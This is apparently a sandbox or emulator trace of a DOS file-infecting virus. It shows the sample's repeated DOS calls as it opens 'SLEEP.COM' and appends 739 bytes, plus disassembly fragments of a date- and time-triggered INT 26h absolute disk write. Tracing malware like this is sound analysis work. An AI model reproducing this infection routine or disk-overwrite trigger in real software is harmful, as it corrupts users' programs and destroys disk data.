2018-12-25T11:58:30.911817131Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.919825374Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.921727112Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.925787969Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.935099764Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.936580934Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.944928948Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.95433281Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.957317881Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.965700263Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.973271702Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.97502471Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.978466929Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.9883548Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.990043409Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.997454244Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.010965095Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.014755338Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.022625227Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.031634948Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.032876133Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.035566522Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.045146281Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.049061343Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.056596925Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.066352466Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.070544721Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.078078692Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.085384277Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.088358249Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.091662432Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.101998631Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.104531009Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.111521139Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.120576463Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.124212777Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.131186107Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.13794513Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.1402686Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.143190013Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.151644286Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.153004931Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.160168968Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.16953505Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.172240471Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:31.175296859Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:31.17779007Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:31.205069547Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:31.206969234Z 78 PC: 12afb | Find first file
2018-12-25T11:58:31.213719821Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:31.220173278Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:31.239927731Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:31.241407506Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:31.244056313Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:31.258563675Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:31.260111826Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:31.267332714Z 62 PC: 12aef | Close file
2018-12-25T11:58:31.275717165Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.278464394Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.28497766Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.291514582Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.294339405Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.297192423Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.305420905Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.307805899Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.314270667Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.322347362Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.326032552Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.332672197Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.33914166Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.341248551Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.344308002Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.352153985Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.354129923Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.360489121Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.369106787Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.373412619Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.379924224Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.386160047Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.388678491Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.397006641Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.405211247Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.406846497Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.414044619Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.42231252Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.425120176Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.432230749Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.438789415Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.440105897Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.443759889Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.451526473Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.452850892Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.474505766Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.482615739Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.484961071Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.491729593Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.495611459Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.496485491Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.498921026Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.507211188Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.508257994Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.515229905Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.520490741Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.522136561Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:31.528677646Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:31.534765028Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:31.536037483Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:31.539277076Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:31.5472653Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:31.548663502Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:31.555074693Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:31.563028283Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:31.565253112Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:31.567591439Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:31.569494696Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:31.571408862Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:31.577370816Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:31.956539328Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:31.959792241Z 78 PC: 12afb | Find first file
2018-12-25T11:58:31.965608058Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:31.971970093Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:31.97850857Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:31.979837336Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:31.982354955Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:31.997911651Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:31.999567941Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.005846308Z 62 PC: 12aef | Close file
2018-12-25T11:58:32.014019744Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.016757028Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.02302025Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.029099963Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.030899253Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.033399558Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.041098053Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.04279366Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.049125015Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.057338987Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.061056082Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.067249976Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.073468683Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.080969497Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.083570254Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.091160666Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.093054558Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.099883832Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.107688796Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.11054901Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.116795782Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.122876634Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.124671121Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.127157896Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.135105102Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.136758788Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.143067031Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.150746511Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.153564104Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.159911444Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.166120597Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.168341215Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.17095661Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.178944669Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.180671557Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.187136839Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.195572576Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.198248345Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.204722131Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.210741822Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.21227627Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.214783372Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.223368148Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.225222992Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.231552187Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.239506798Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.242354488Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.248728388Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.255254664Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.256729823Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.259605086Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.267115122Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.268370558Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.275072801Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.283066521Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.285413936Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:32.287651512Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:32.289700614Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:32.309151399Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:32.314142083Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:32.156580385Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:32.157942951Z 78 PC: 12afb | Find first file
2018-12-25T11:58:32.165393632Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:32.17244356Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:32.179378398Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:32.183782776Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.186778025Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:32.202468242Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:32.204738401Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.212004854Z 62 PC: 12aef | Close file
2018-12-25T11:58:32.22104706Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.228656743Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.236252666Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.241223379Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.242869706Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.246254346Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.260701124Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.262219865Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.269643183Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.279547913Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.282544322Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.291078693Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.298395441Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.300161162Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.304177413Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.312991692Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.314513928Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.322882481Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.332403479Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.335647681Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.346304419Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.353615029Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.355847065Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.359489247Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.368312934Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.369898733Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.377836087Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.386788524Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.38978407Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.397460792Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.404367573Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.405686674Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.409466947Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.418318948Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.419672753Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.425566642Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.436559092Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.439823591Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.448097995Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.455688073Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.457219249Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.460145375Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.470855966Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.472296828Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.479360202Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.488972123Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.491802263Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.498825218Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.508620535Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.510135989Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.512951117Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.521822528Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.523243652Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.530112418Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.53968771Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.542416368Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:32.544761402Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:32.547156749Z 44 PC: 12be2 | Get time 0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:32.550254727Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:32.556439627Z 26 PC: 12ab9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:32.20371014Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:32.211173074Z 78 PC: 12afb | Find first file
2018-12-25T11:58:32.217723076Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:32.229212236Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:32.236278153Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:32.241505775Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.244601725Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:32.261200832Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:32.264070686Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:32.271391578Z 62 PC: 12aef | Close file
2018-12-25T11:58:32.280250806Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.283867635Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.291110392Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.297987299Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.300766416Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.304266969Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:32.314636359Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:32.322513238Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:32.330385872Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:32.339468707Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:32.342322872Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:32.351451031Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:32.358650791Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:32.360132989Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:32.364676144Z 64 PC: 12b4c | Write file or device (See above)
